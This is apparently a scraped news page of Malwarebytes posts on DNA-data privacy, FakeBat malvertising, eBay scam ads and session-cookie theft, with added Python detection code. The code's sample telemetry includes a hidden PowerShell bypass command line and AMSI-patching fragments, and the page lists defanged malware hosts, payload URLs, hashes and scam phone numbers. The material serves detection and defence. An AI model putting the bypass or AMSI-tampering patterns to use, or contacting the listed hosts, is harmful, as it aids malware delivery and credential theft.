IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

DNA testing company vanishes along with its customers’ genetic data

A DNA testing company that promised clients insights into their genetic disposition has suddenly disappeared. The BBC reports that it tried several ways to reach the company, without success.

Its London offices are closed, nobody answers the phone, and clients can no longer access their online records. None of the company’s social media accounts has been updated since 2023 at the latest.

The atlasbiomed.com domain appears to be inactive. Customers could only view their test results online; the results were never downloadable. So they are now not only unable to see them, but also have no idea what has happened to that data.

Although there is no evidence that any of the data has been misused, it is worrying not to know who now has access to it, especially since the investigation shows there might be ties to Russia.

While four of the company’s eight officers have resigned, two of those who remain are listed at the same address in Moscow. That happens to be the same address as that of a Russian billionaire who is described as a now-resigned director.

DNA testing has become so commonplace that many people have participated without truly understanding the implications. It has always been hard to work out whom you can trust with your genetic data, and for some people a consumer test is their cheapest chance of finding out whether they are affected by a genetic disorder.

Since those early days, we’ve had several warnings about how submitting your genetic data can go sideways.

In 2018, MyHeritage suffered a security incident which exposed the email addresses and hashed passwords of 92 million users.

In 2020, Ancestry was acquired by investment firm Blackstone for $4.7 billion, which raised questions about the potential commercialization of genetic data and its transfer to new owners.

And the ongoing saga of what happened at 23andMe is the clearest example of why people would be hesitant to submit genetic data. In 2023, cybercriminals put up information belonging to as many as seven million 23andMe customers for sale on criminal forums following a credential stuffing attack against the genomics company.

Since then all board members have resigned, except for CEO Anne Wojcicki, who has stood by her plans to take the company private, raising again the question of what happens to customer genetic data when a company is sold.

Data breaches happen to the best companies. So even if a company has good intentions, there is still a risk of your genetic data being linked to your personally identifiable information (PII), and that combination is a treasure trove for advertisers, insurers, and Big Pharma.

All of this makes it very understandable that customers of Atlas Biomed are worried about where their data might end up.

Words of warning

The UK regulator, the Information Commissioner’s Office (ICO) has confirmed it has received a complaint about Atlas Biomed, saying in a statement:

“People have the right to expect that organizations will handle their personal information securely and responsibly.”

Unfortunately, we know that not all organizations will meet that expectation, so there are a few things you should keep in mind.

If you submit genetic material, research the company you want to trust with it thoroughly.

Only share the personal information you absolutely have to provide to the genetic testing company. Lie if you must, and create a separate free email account so the information can’t be tied to your main account.

Make sure to familiarize yourself with the company’s privacy policy and opt out of sharing information where possible. Make sure to stay informed about any policy updates or changes from the company.

As a wise lady and one of my former editors once wrote:

“Many a friend and family member have scoffed at my warnings to stay away from consumer DNA testing kits, remarking that they have nothing to hide or that there’s no harm in releasing their DNA into the hands of researchers. I honestly hope they’re right.

I hope they never have to fear having their health insurance ripped away because of pre-existing conditions or an increased risk of developing certain diseases. I hope they aren’t inundated with marketing emails about cancer-preventative nutrition or the best new medicines to prolong the onset of Alzheimer’s. I sincerely hope they’re never targeted by racial-profiling police officers, denied a job by a prejudiced employer or buried in paperwork after having their identity stolen by a hacker. And I fervently hope they’ll never have to hide their genetic profile from a government hell-bent on ridding its country of a certain ethnicity or race.”


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A week in security (November 4 – November 10)

Last week on Malwarebytes Labs:

Last week on ThreatDown:

Stay safe!


Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Hello again, FakeBat: popular loader returns after months-long hiatus

The web browser, and search engines in particular, continue to be a popular entry point for delivering malware to users. While we noted a decrease in loaders distributed via malvertising over the past three months, today’s example is a reminder that threat actors can quickly switch back to tried and tested methods.

After months of absence, FakeBat (also known as Eugenloader and PaykLoader) showed up on our radar again via a malicious Google ad for the productivity application Notion. FakeBat is a loader that has been used to drop follow-up payloads such as the Lumma stealer.

In this blog post, we detail how criminals target their victims and what final malware payload they deliver after the initial infection. The incident was found and reported to Google on the day of this publication.

Google Ads distribution

The last time we saw FakeBat was on July 25, 2024, via a malicious ad for Calendly, a popular online scheduling application. In that instance, FakeBat’s command and control infrastructure ran from utd-gochisu[.]com.

Fast forward to November 8, 2024, and we have an ad appearing at the top of a Google search for ‘notion’. That sponsored result looks entirely authentic, with the official logo and website. We already know that criminals can impersonate any brand they like by simply using a click tracker (a tracking template) to bypass detection.

image 00e479

According to Google’s Ads Transparency Center, the Notion ad was shown in the following geographic locations:

image b7f9c2

Below is the network traffic from the ad URL to the payload. We can see the use of the tracking template (smart.link), followed by a cloaking domain (solomonegbe[.]com), before landing on the decoy site (notion[.]ramchhaya.com):

image c03d18

Why does this work and bypass Google’s review? Likely because if the visitor is not an intended victim, the tracking template redirects them to the legitimate notion.so website, so reviewers and scanners only ever see the real site.

FakeBat drops LummaC2 stealer

After extracting the payload, we recognize the classic first-stage FakeBat PowerShell:

image 07f473

Security researcher and long-time FakeBat enthusiast RussianPanda was kind enough to give us a hand by looking at this installer in closer detail.

After some fingerprinting to avoid sandboxes, we get this second-stage PowerShell:

image f1c809

Of note, the threat actors are still using the same old RastaMouse AMSI bypass script from April 2024:

image e5a808

The loader is obfuscated with .NET Reactor. It decrypts an embedded resource with AES and then injects the result into MSBuild.exe via process hollowing:

image e1b48c

The decrypted payload is LummaC2 Stealer with user ID: 9zXsP2.
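The chain described above (sandbox fingerprinting, AMSI tampering, an AES-decrypted payload hollowed into MSBuild.exe) gives a defender two cheap hunting rules: a PowerShell host launching MSBuild.exe with nothing to build, and script text that reaches into AMSI internals. The Python below is an added example, not Malwarebytes’ or RussianPanda’s tooling. Its telemetry records are constructed to resemble Sysmon process-creation events and PowerShell script-block logs; the field names and every file path in them are placeholders, not data from the incident.

```python
"""Hunting rules for the FakeBat behaviours described above.

Added example: this is not Malwarebytes' or RussianPanda's tooling. The event
records are constructed to resemble Sysmon process-creation events (image,
parent, command line) and PowerShell script-block logs (script text); the field
names and the file paths in them are assumptions for the demonstration.
"""
import ntpath
import re

PS_HOSTS = {"powershell.exe", "pwsh.exe"}

# A legitimate MSBuild run is almost always handed something to build.
BUILD_INPUT = re.compile(r"\.(csproj|vbproj|proj|sln|targets)\b", re.IGNORECASE)

# Tokens that appear in the published AMSI-patching one-liners. Assumption:
# script-block logging preserves the script text; string-split or encoded
# variants need de-obfuscation first.
AMSI_TAMPER = re.compile(r"AmsiScanBuffer|amsiInitFailed|AmsiUtils|amsi\.dll",
                         re.IGNORECASE)

# Constructed sample telemetry (not real logs from the incident).
EVENTS = [
    {"id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Users\victim\Downloads\Notion-Setup\installer.exe",
     "cmdline": r"powershell.exe -nop -w hidden -ep bypass -File C:\Users\Public\stage1.ps1"},
    {"id": 2,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"},
    {"id": 3,
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
    {"id": 4,
     "script": '$h = [Win32]::LoadLibrary("amsi.dll")\n'
               '$p = [Win32]::GetProcAddress($h, "AmsiScanBuffer")'},
    {"id": 5,
     "script": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"},
]


def _base(path):
    return ntpath.basename(path).lower()


def is_hollowing_candidate(ev):
    """powershell.exe launching MSBuild.exe with nothing to build matches the
    process-hollowing step above (payload decrypted and injected into MSBuild)."""
    if "image" not in ev:
        return False
    return (_base(ev["image"]) == "msbuild.exe"
            and _base(ev["parent"]) in PS_HOSTS
            and not BUILD_INPUT.search(ev["cmdline"]))


def is_amsi_tamper(ev):
    """Script text that reaches into AMSI internals, as the second stage does."""
    return "script" in ev and AMSI_TAMPER.search(ev["script"]) is not None


def hunt(events):
    """Return (event id, rule name) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        if is_hollowing_candidate(ev):
            hits.append((ev["id"], "msbuild-spawned-by-powershell"))
        if is_amsi_tamper(ev):
            hits.append((ev["id"], "amsi-tamper"))
    return hits


if __name__ == "__main__":
    for event_id, rule in hunt(EVENTS):
        print(f"event {event_id}: {rule}")
```

Event 3 is the control: MSBuild started by Visual Studio with a .csproj on the command line is normal developer activity and must not fire. The AMSI rule is deliberately string-based and will miss a bypass that builds its strings at runtime, so treat it as a tripwire, not a complete detection.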

Conclusion

While malicious ads delivering malware payloads have been rarer for the past several weeks, today’s example shows that threat actors can and will make a comeback whenever the time is right.

Brand impersonation via Google ads remains problematic, as anyone can leverage built-in features to appear legitimate and trick users into downloading malware.

We would like to thank RussianPanda for the quick analysis of the payload, as well as security researcher Sqiiblydoo for reporting the malicious certificate used to sign the installer.



Indicators of Compromise

Malvertising chain

solomonegbe[.]com
notion[.]ramchhaya.com

Malicious Notion installer

34c46b358a139f1a472b0120a95b4f21d32be5c93bc2d1a5608efb557aa0b9de

FakeBat C2

ghf-gopp1rip[.]com

1.jar (PaykRunPE)

2de8a18814cd66704edec08ae4b37e466c9986540da94cd61b2ca512d495b91a

LummaC2 (decrypted payload)

de64c6a881be736aeecbf665709baa89e92acf48c34f9071b8a29a5e53802019

JwefqUQWCg (encrypted resource)

6341d1b4858830ad691344a7b88316c49445754a98e7fd4a39a190c590e8a4db

Malicious URLs

furliumalerer[.]site/1.jar
pastebin[.]pl/view/raw/a58044c5

LummaC2 Stealer C2s:

rottieud[.]sbs
relalingj[.]sbs
repostebhu[.]sbs
thinkyyokej[.]sbs
tamedgeesy[.]sbs
explainvees[.]sbs
brownieyuz[.]sbs
slippyhost[.]cfd
ducksringjk[.]sbs
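Defanged indicators are meant to be pasted, not typed. The Python below is an added example, not Malwarebytes tooling: it refangs the indicators from the list above, keeps the pastebin[.]pl entry as a full URL rather than a DNS blocklist entry (blocking the whole shared host would be noise), and sweeps a DNS log and a hash export for matches. The log lines, the hash export and the log format are constructed for the demonstration; only the indicator strings come from the page.

```python
"""Refang the indicators listed above and sweep logs for them.

Added example, not Malwarebytes tooling. The indicator strings are copied from
the IoC section; the DNS log lines and the file hashes being checked are
constructed for the demonstration, and the log format is an assumption.
"""
import re

# Indicators from the IoC section, still defanged as published.
DEFANGED = """
solomonegbe[.]com
notion[.]ramchhaya.com
ghf-gopp1rip[.]com
furliumalerer[.]site/1.jar
pastebin[.]pl/view/raw/a58044c5
rottieud[.]sbs
slippyhost[.]cfd
"""

KNOWN_BAD_SHA256 = {
    "34c46b358a139f1a472b0120a95b4f21d32be5c93bc2d1a5608efb557aa0b9de",  # Notion installer
    "2de8a18814cd66704edec08ae4b37e466c9986540da94cd61b2ca512d495b91a",  # 1.jar
    "de64c6a881be736aeecbf665709baa89e92acf48c34f9071b8a29a5e53802019",  # LummaC2
}

SHARED_HOSTS = {"pastebin.pl"}  # legitimate shared service: match the full URL only


def refang(indicator):
    """Undo the usual defanging: [.] -> ., [:] -> :, hxxp -> http."""
    s = indicator.strip()
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)


def host_of(indicator):
    """Hostname of a refanged indicator, with any scheme and path removed."""
    s = re.sub(r"^[a-z][a-z0-9+.-]*://", "", refang(indicator), flags=re.IGNORECASE)
    return s.split("/", 1)[0].lower()


def split_indicators(text):
    """Build a DNS blocklist (attacker-controlled hosts) and a URL blocklist
    (indicators carrying a path). Hosts of shared services only go in the latter."""
    domains, urls = set(), set()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        host = host_of(line)
        if "/" in line:
            urls.add(refang(line))
        if host not in SHARED_HOSTS:
            domains.add(host)
    return domains, urls


def matches_domain(qname, domains):
    """True if qname is a listed domain or any subdomain of one."""
    q = qname.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


# Constructed DNS log: "<timestamp> <client> <queried name>".
DNS_LOG = """\
2024-11-08T14:02:11Z 10.0.0.23 www.notion.so
2024-11-08T14:02:14Z 10.0.0.23 solomonegbe.com
2024-11-08T14:02:15Z 10.0.0.23 notion.ramchhaya.com
2024-11-08T14:03:40Z 10.0.0.23 cdn.ghf-gopp1rip.com
2024-11-08T14:05:02Z 10.0.0.41 slippyhost.cfd
2024-11-08T14:05:09Z 10.0.0.41 pastebin.pl
2024-11-08T14:05:30Z 10.0.0.41 example.org
"""


def sweep_dns(log, domains):
    """(client, queried name) for every lookup that hits the DNS blocklist."""
    hits = []
    for line in log.splitlines():
        _ts, client, qname = line.split()
        if matches_domain(qname, domains):
            hits.append((client, qname))
    return hits


def sweep_hashes(observed, known_bad=KNOWN_BAD_SHA256):
    """Intersect hashes from an EDR/AV export with the published ones."""
    return sorted({h.lower() for h in observed} & known_bad)


if __name__ == "__main__":
    domains, urls = split_indicators(DEFANGED)
    print("DNS hits:", sweep_dns(DNS_LOG, domains))
    print("URL blocklist:", sorted(urls))
```

The cdn.ghf-gopp1rip.com lookup in the sample is matched as a subdomain of the listed C2, while the pastebin.pl lookup is deliberately ignored at the DNS layer; the pastebin indicator belongs in a proxy or URL filter where the full path is visible.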

TikTok ordered to close Canada offices following “national security review”

The Government of Canada has ordered TikTok Technology Canada Inc. to close its offices in the country following a national security review.

This decision was made in accordance with the Investment Canada Act, which allows for the review of foreign investments that may be injurious to Canada’s national security. Canada’s Minister of Innovation, Science and Industry stated:

“As a result of a multi-step national security review process, which involves rigorous scrutiny by Canada’s national security and intelligence community, the Government of Canada has ordered the wind up of the Canadian business carried on by TikTok Technology Canada, Inc. The government is taking action to address the specific national security risks related to ByteDance Ltd.’s operations in Canada through the establishment of TikTok Technology Canada, Inc. The decision was based on the information and evidence collected over the course of the review and on the advice of Canada’s security and intelligence community and other government partners.”

This does not mean Canadians will lose access to the popular social media platform. It just means the Chinese-owned company will have to close its Canadian operations, located in Toronto and Vancouver.

Canada says that whether citizens use the social media platform is a personal choice, but it encourages Canadians to consult the guidance issued by the Communications Security Establishment’s Canadian Centre for Cyber Security to help them assess the risks.

One of the key points of that guidance is the “security over convenience” guideline, which says:

“It may be convenient to have an app always know your location or be able to fetch your photos without approval, but this isn’t the most secure option. Be aware of the features and elements of your device that can be accessed by an app, and make sure you limit permissions.”

Another one that matters in this case is the “consider where your data is being stored” guideline, which reminds people to think about which nation’s laws will apply to their information and their activity on the platform.

TikTok responded that:

“Shutting down TikTok’s Canadian offices and destroying hundreds of well-paying local jobs is not in anyone’s best interest, and today’s shutdown order will do just that. We will challenge this order in court.”

TikTok’s Chinese ownership has caused problems in other countries as well. In April 2024, Malwarebytes Labs reported on how the US Senate approved a bill that would effectively ban TikTok from the country unless Chinese owner ByteDance sells its stake in the immensely popular app. That law is currently being challenged in court by the platform.

We don’t just report on threats – we help protect your social media

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

Air fryers are the latest surveillance threat you didn’t consider

Consumer group Which? has warned shoppers to be selective when it comes to buying smart air fryers from Xiaomi, Cosori, and Aigostar.

We’ve learned to expect that “smart” appliances come with privacy risks (toothbrushes aside), but I really hadn’t given my air fryer any thought. That is about to change.

You don’t need to worry about air fryers sending reports on your eating habits to your healthcare provider just yet. But according to Which?, the air fryers’ companion phone apps wanted to know customers’ precise location, as well as permission to record audio on the user’s phone.

The researchers also found that the Aigostar and Xiaomi fryers both sent personal data to servers in China. This was specified in the privacy notice, but we know not everyone reads those.

When buying any kind of smart device, it’s worth doing these things:

  • Question the permissions an app asks for on your phone. Do they serve a purpose for you, the user, or is the vendor just being nosy?
  • Read the privacy policy. Vendors are counting on you not doing so, but privacy policies are sometimes very revealing.
  • Ask yourself whether the appliance needs to be smart at all. What’s in it for you, and what price are you going to pay?

An easy solution is not to install the app, and not to give manufacturers personal data they do not need. They may need your name for the warranty, but your gender, age, and, most of the time, your address are not needed.

You shouldn’t be surprised to find out that appliances that are activated by voice commands are listening to you. How else do you expect them to know you are giving them an order?

It’s what they do with the information and how well they are secured against abuse by third parties that we should be concerned with.



Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities 

Today I have great news to share: We’ve acquired AzireVPN, a privacy-focused VPN provider based in Sweden. 

I wanted to share with you our intentions behind this exciting step, and what this means for our existing users and the family of solutions they rely on to keep them private and secure. 

Malwarebytes has long been an advocate for user privacy (think Malwarebytes Privacy VPN and our free web extension Malwarebytes Browser Guard). Now, we’re leaning even more on our mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.  

With AzireVPN’s infrastructure and intellectual property, Malwarebytes is poised to develop more advanced VPN technologies and features, offering increased flexibility and enhanced security for our users. 

Why AzireVPN? 

AzireVPN is renowned for its robust security standards and privacy-first commitment. Here are two examples of what the company does to support that: 

  • AzireVPN physically owns and controls all of its dedicated and diskless servers—a practice Malwarebytes is committed to continuing.  
  • The company developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.  

What does this mean for existing Malwarebytes Privacy VPN customers? 

There are no changes for Malwarebytes Privacy VPN customers at this time. They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.  

What does this mean for existing AzireVPN customers? 

AzireVPN customers will also continue to enjoy the same privacy-focused VPN service – no logs, no data collection, no bandwidth limitations. There will continue to be no requirement to share any information to sign up for the service.   

An exciting future is ahead of us 

We’ll share more details on our future VPN offering in the coming months.  

I’m so excited about our future. This is yet another milestone for Malwarebytes, underscoring our commitment to privacy and a free and open internet.  

Thanks for putting your trust in us to protect you. 

Large eBay malvertising campaign leads to scams

Tech support scammers are targeting eBay customers in the U.S. via fraudulent Google ads. In a few separate searches, we identified multiple Sponsored results created from at least four different advertiser accounts.

While most of those ads clearly looked fake, they appeared consistently and prominently enough to trick an inattentive user. Victims who clicked an ad were redirected to bogus websites prompting them to call for assistance, leading them straight into the scammers’ den.

We have reported the malicious ads to Google and are monitoring for similar campaigns targeting other brands.

Flurry of ads

A search for ‘ebay phone number’ or ‘ebay customer service’ from the U.S. using Google Chrome returned several ads that were entirely fraudulent. On closer inspection, we found that they were created from four separate advertiser accounts, some belonging to legitimate entities, some created from scratch.

image 9dc66c

The first ad in the screenshot above is the most deceptive of all, since it uses eBay’s brand name, logo and website. While Google has strict rules about who may do this (the owner and its affiliates), scammers are able to “comply” with the rule and still be total crooks.

All they need to do is ensure that the final URL (the one you land on after clicking the ad) is on the same domain as, or a subdomain of, the one shown in the ad. That’s the case here: they are using developer.ebay.com (part of eBay’s Developers Program search), which can technically be claimed as belonging to ebay.com.

Yet, as you can see below, the destination URL is not what one would expect. It shows a search portal whose echoed search query contains what is presented as eBay’s customer service phone number (narrator: it is not).

image 9880e2

This is a trick we’ve seen recently with various online platforms: the scammer crafts a search query on a legitimate site, knowing full well that no result will be found. What matters is that the query text is printed back on screen, where it fools the people who see it. In the example above, the search query was for “eBay.Customer-Service +1 (866) 409[-]9281”.
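The two tricks above (a reflected search query on a legitimate domain, and lookalike hostnames on free hosting) can both be caught from the ad’s final URL alone, which is what a browser extension or a proxy sees. The Python below is an added example, not Malwarebytes tooling. The developer.ebay.com search path is an assumption, since the post only shows a screenshot; the phone number and the hostnames are taken from the Indicators of Compromise further down, and the remaining sample URLs are constructed.

```python
"""Spot the two ad-abuse patterns described above in an ad's final URL.

Added example, not Malwarebytes tooling. The developer.ebay.com search path is
an assumption (the post shows a screenshot, not the URL); the phone number and
the hostnames come from the Indicators of Compromise below, and the rest of the
sample URLs are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# North American number, with or without +1, brackets, spaces, dots or dashes.
PHONE = re.compile(r"(?:\+?1[\s.-]*)?\(?\d{3}\)?[\s.-]*\d{3}[\s.-]*\d{4}")
SUPPORT = re.compile(
    r"customer[\s.-]*(?:service|support|care)|help\s*desk|phone\s*number|toll[\s-]*free",
    re.IGNORECASE)
OFFICIAL = "ebay.com"
LOOKALIKE = re.compile(r"e-?bay", re.IGNORECASE)


def is_official_host(host):
    host = host.lower()
    return host == OFFICIAL or host.endswith("." + OFFICIAL)


def reflected_search_lure(url):
    """Return the offending query text if any query parameter carries a phone
    number together with support wording: the 'search for the scam number on a
    real site so the site prints it back' trick."""
    for values in parse_qs(urlsplit(url).query).values():
        for v in values:
            if PHONE.search(v) and SUPPORT.search(v):
                return v
    return None


def classify(url):
    """('reflected-search-lure', query) | ('lookalike-host', host) | ('ok', host)."""
    host = (urlsplit(url).hostname or "").lower()
    lure = reflected_search_lure(url)
    if lure:
        return ("reflected-search-lure", lure)
    if not is_official_host(host) and LOOKALIKE.search(host):
        return ("lookalike-host", host)
    return ("ok", host)


# Constructed final URLs (hosts and number taken from the IoC list; paths assumed).
SAMPLES = [
    "https://developer.ebay.com/search?q=eBay.Customer-Service+%2B1+%28866%29+409-9281",
    "https://developer.ebay.com/search?q=finding+api+rate+limit",
    "https://www.ebay.com/help/home",
    "https://e-bay24x7pluscaresupport.bitbucket.io/",
    "https://e-bay24x7-customers-services-assist.onrender.com/",
    "https://upbay.online/",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(classify(u), "<-", u)
```

Note the last sample: upbay.online, which is in the IoC list, passes the brand-token check as “ok”. A lookalike heuristic catches the obvious cases and nothing more; it needs a blocklist alongside it, which is why the domains are published below.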

The other ads redirect to fake websites or pages hosted on cloud providers such as BitBucket, claiming to be eBay customer service. Once again, scammers make it clear and obvious that users should call the phone number displayed on screen.

image dff3c5

Keeping scammers at bay

Calling any of those phone numbers is strongly discouraged, unless of course your favorite sport is scam baiting. The tried and tested tech support scam is one of the most costly types of crime for American consumers.

From call centres mostly located overseas, operators will attempt to trick victims into giving them access to their computer or phone. The end goal is to steal as much money as they can, by requesting gift cards or by taking over people’s bank accounts.

It is important to always double check before calling any phone number, especially if it came from an ad or an unsolicited email. If in doubt, go to the source, i.e. ebay.com, to access support via live chat or get the official number.

If you aren’t already, you may want to consider using a browser extension such as Malwarebytes Browser Guard. Not only does it block ads, it also detects phishing sites of various kinds.


We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Indicators of Compromise

Fake pages

e-bays-24x7support-number[.]vercel[.]app
developer[.]ebay[.]com
e-bay24x7pluscaresupport[.]bitbucket[.]io
upbay[.]online
e-bay24x7customer[.]casterins[.]online
e-bay24x7-customers-services-assist[.]onrender[.]com

Fraudulent phone numbers

1[-]866[-]409[-]9281
1[-]833[-]714[-]3970
1[-]805[-]372[-]1369

Warning: Hackers could take over your email account by stealing cookies, even if you have MFA

The Federal Bureau of Investigation (FBI) has issued a warning that cybercriminals are taking over email accounts via stolen session cookies, allowing them to bypass the multi-factor authentication (MFA) the user has set up.

Here’s how it works.

Most of us don’t think twice about checking the “Remember me” box when we log in. When you log in and the server has verified your authentication, straight away or after MFA, the server creates a session and generates a unique session ID. This session ID is stored in a session cookie (or a “Remember-Me cookie”, as the FBI calls it) in your browser, which is typically valid for 30 days.

Every time you return to that website within the time frame, you don’t need to log in. That’s really convenient… unless someone manages to steal that cookie from your system.

If someone steals the session cookie, they can present it to the site and be treated as you, even if you have MFA enabled: the MFA check happened when the session was created, and the cookie is the proof that it passed, so it is never asked for again.

This is particularly relevant for email providers that have an online (webmail) component. That includes major players like Gmail, Outlook, Yahoo, and AOL.

With access to your email account, a cybercriminal can find a lot of useful information about you, such as where you bank, your account numbers, your favorite shops, and more. This information could then be used for targeted cyberattacks that mention information that’s relevant to you only, leaving you more likely to fall for them.

Cybercriminals could use your account to spread spam and phishing emails to your contacts. And perhaps most worrying of all, once an attacker is in your email account, they can reset the passwords of your other accounts and log in as you there too.

How do these criminals get their hands on your session cookies? There are several ways.

Less commonly, session cookies can be stolen when you visit a malicious website, or via a Machine-in-the-Middle (MitM) attack, where a criminal on an unsecured network intercepts your traffic and grabs any cookie that is sent without HTTPS protection.

More often, however, session cookies are stolen by malware on your device. Modern information-stealing malware is capable of, and even focuses on, lifting session cookies from the browser’s cookie store as part of its activity. Cookie attributes such as Secure and HttpOnly do not help here: they limit what a web page or a network observer can see, not what a program running under your account can read from disk.

How to keep your email account safe

There are a few things you can do to stay safe from the cookie thieves:

  • Use security software on every device you use.
  • Keep your devices and the software on them up to date, so there aren’t any known vulnerabilities on them.
  • Decide whether you think it’s worth using the Remember me option. Is convenience worth the risk in this situation?
  • Delete cookies, or, even better, log out when you are done. Logging out should make the server remove or invalidate the session ID, so nobody can use it even if they hold a copy of the cookie; merely deleting the cookie on your own machine does not stop a copy that was already taken.
  • Only visit sites with a secure connection (HTTPS) to protect your data from being intercepted during transmission.
  • For important accounts, regularly check the login history, where you can see which devices logged in, when, and from where. You should be able to find this option in your account settings.
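The advice above rests on one server-side fact: the cookie is only a lookup key, and the MFA check it stands for is never repeated. The Python below is an added example, not code from the FBI notice or from any webmail provider. It models a minimal server-side session table with an injectable clock and replays the scenario: the theft, the victim logging out, the 30-day “remember me” expiry, and a “sign out everywhere” after a suspected compromise. The 30-day lifetime is the figure mentioned above; the 8-hour lifetime of a plain session is an assumption.

```python
"""Why a stolen session cookie works, and what actually revokes it.

Added example, not code from the FBI notice or any webmail provider. It is a
minimal server-side session table with an injectable clock; the 30-day
'remember me' lifetime is the figure mentioned above, the 8-hour ordinary
session is an assumption.
"""
import secrets
import time


class SessionStore:
    REMEMBER_ME_TTL = 30 * 24 * 3600   # ~30 days, as described above
    SHORT_TTL = 8 * 3600               # assumption: a plain login lasts a workday

    def __init__(self, clock=time.time):
        self._sessions = {}   # cookie value -> (user, expiry timestamp)
        self._clock = clock

    def login(self, user, remember_me=False):
        """Called only after password and MFA have been verified. The cookie
        value is a random secret; nothing about it can be re-checked later,
        which is exactly why a copy of it is as good as the original."""
        cookie = secrets.token_urlsafe(32)
        ttl = self.REMEMBER_ME_TTL if remember_me else self.SHORT_TTL
        self._sessions[cookie] = (user, self._clock() + ttl)
        return cookie

    def whoami(self, cookie):
        """Resolve a presented cookie to a user, or None (log in again)."""
        entry = self._sessions.get(cookie)
        if entry is None:
            return None
        user, expiry = entry
        if self._clock() >= expiry:
            del self._sessions[cookie]
            return None
        return user

    def logout(self, cookie):
        """Forget the session server-side; every copy of the cookie dies with it."""
        self._sessions.pop(cookie, None)

    def logout_everywhere(self, user):
        """'Sign out of all devices': the right response to a suspected theft."""
        for c in [c for c, (u, _) in self._sessions.items() if u == user]:
            del self._sessions[c]


def cookie_theft_timeline():
    """Replay the scenario above with a fake clock. Returns what the attacker's
    copy of the cookie resolves to after each step."""
    now = [1_700_000_000.0]
    store = SessionStore(clock=lambda: now[0])
    steps = {}

    cookie = store.login("alice", remember_me=True)
    stolen = cookie                               # infostealer copies the cookie store
    steps["after_theft"] = store.whoami(stolen)   # 'alice': no MFA prompt for the thief

    store.logout(cookie)                          # victim logs out
    steps["after_logout"] = store.whoami(stolen)  # None: server no longer knows it

    stolen = store.login("alice", remember_me=True)
    now[0] += SessionStore.REMEMBER_ME_TTL + 1    # victim never logs out; 30 days pass
    steps["after_expiry"] = store.whoami(stolen)  # None: expired server-side

    stolen = store.login("alice", remember_me=True)
    store.logout_everywhere("alice")              # victim hits 'sign out everywhere'
    steps["after_logout_everywhere"] = store.whoami(stolen)
    return steps


if __name__ == "__main__":
    for step, who in cookie_theft_timeline().items():
        print(f"{step:24} -> {who}")
```

Two things the model makes visible. Revocation only works because the server keeps state: a self-contained signed token that the server does not track cannot be killed by a logout, however the client behaves. And nothing here stops a thief who replays the cookie before the victim logs out, so “log out when you are done” shortens the window rather than closing it; the login-history check in the list above is what catches use inside that window.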


Why your vote can’t be “hacked,” with Cait Conley of CISA (Lock and Code S05E23)

This week on the Lock and Code podcast…

The US presidential election is upon the American public, and with it come fears of “election interference.”

But “election interference” is a broad term. It can mean the now-regular and expected foreign disinformation campaigns that are launched to sow political discord or to erode trust in American democracy. It can include domestic campaigns to disenfranchise voters in battleground states. And it can include the upsetting and increasing threats made to election officials and volunteers across the country.

But there’s an even broader category of election interference that is of particular interest to this podcast, and that’s cybersecurity.

Elections in the United States rely on a dizzying number of technologies. There are the voting machines themselves, there are electronic pollbooks that check voters in, there are optical scanners that tabulate the votes that the American public actually make when filling in an oval bubble with pen, or connecting an arrow with a solid line. And none of that is to mention the infrastructure that campaigns rely on every day to get information out—across websites, through emails, in text messages, and more.

That interlocking complexity is only multiplied when you remember that each, individual state has its own way of complying with the Federal government’s rules and standards for running an election. As Cait Conley, Senior Advisor to the Director of the US Cybersecurity and Infrastructure Security Agency (CISA) explains in today’s episode:

“There’s a common saying in the election space: If you’ve seen one state’s election, you’ve seen one state’s election.”

How, then, are elections secured in the United States, and what threats does CISA defend against?

Today, on the Lock and Code podcast with host David Ruiz, we speak with Conley about how CISA prepares and trains election officials and volunteers before the big day, whether or not an American’s vote can be “hacked,” and what the country is facing in the final days before an election, particularly from foreign adversaries that want to destabilize American trust.

”There’s a pretty good chance that you’re going to see Russia, Iran, or China try to claim that a distributed denial of service attack or a ransomware attack against a county is somehow going to impact the security or integrity of your vote. And it’s not true.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)


Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

Crooks bank on Microsoft’s search engine to phish customers

We have identified a new wave of phishing for banking credentials that targets consumers via Microsoft’s search engine. A Bing search for ‘Keybank login’ currently returns malicious links on the first page, sometimes as the top result. We have already reported the fraudulent sites to Microsoft.

